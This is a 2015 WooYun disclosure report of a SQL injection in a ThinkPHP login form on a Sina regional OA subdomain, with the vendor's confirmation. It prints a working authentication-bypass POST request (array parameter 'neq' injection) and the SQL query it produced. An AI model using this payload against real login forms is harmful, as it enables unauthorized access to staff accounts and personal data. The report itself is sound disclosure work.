当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0109574
漏洞标题:
新浪某分站ThinkPHP框架存在SQL注入问题
相关厂商:
新浪
漏洞作者:
猪猪侠
提交时间:
2015-04-22 00:27
修复时间:
2015-06-06 15:02
公开时间:
2015-06-06 15:02
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-04-22: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经确认,细节仅向厂商公开
2015-05-02: 细节向核心白帽子及相关领域专家公开
2015-05-12: 细节向普通白帽子公开
2015-05-22: 细节向实习白帽子公开
2015-06-06: 细节向公众公开

简要描述:

新浪某分站ThinkPHP框架存在SQL注入问题
http://www.wooyun.org/bugs/wooyun-2014-086742

详细说明:

开启了ThinkPHP调试功能,每条SQL都能查看到
http://oa.gd.sina.com.cn/login/check_login
测试可构造万能密码
WooYun: ThinkPHP架构设计不合理极易导致SQL注入

sql.jpg

漏洞证明:

POST /login/check_login HTTP/1.1
Host: oa.gd.sina.com.cn
Proxy-Connection: keep-alive
Content-Length: 40
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.gd.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.gd.sina.com.cn/login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
emp_no[0]=neq&emp_no[1]=admin&password=1


变成执行了如下SQL:

SELECT User.emp_name AS name,User.id AS id,User.emp_no AS emp_no,User.emp_name AS emp_name,User.letter AS letter,User.password AS password,User.dept_id AS dept_id,User.position_id AS position_id,User.rank_id AS rank_id,User.sex AS sex,User.birthday AS birthday,User.last_login_ip AS last_login_ip,User.login_count AS login_count,User.pic AS pic,User.email AS email,User.duty AS duty,User.office_tel AS office_tel,User.mobile_tel AS mobile_tel,User.create_time AS create_time,User.update_time AS update_time,User.is_del AS is_del,User.openid AS openid,User.westatus AS westatus,User.rank_gwzn AS rank_gwzn,User.rank_name AS rank_name,User.leader AS leader,User.marriage AS marriage,User.native_place AS native_place,User.id_number AS id_number,User.nation AS nation,User.education AS education,User.graduate_school AS graduate_school,User.blood AS blood,User.constellation AS constellation,User.qq AS qq,User.weixin AS weixin,User.weibo AS weibo,User.domicile AS domicile,User.set_order AS set_order,User.is_admin AS is_admin,User.is_city AS is_city,User.grade_id AS grade_id,Dept.name AS dept_name FROM oa_user User JOIN oa_dept Dept ON Dept.id=User.dept_id WHERE ( User.emp_name <> 'admin' ) OR ( User.emp_no <> 'admin' ) LIMIT 1

修复方案:

更新thinkphp

版权声明:转载请注明来源 猪猪侠@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-22 15:01

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无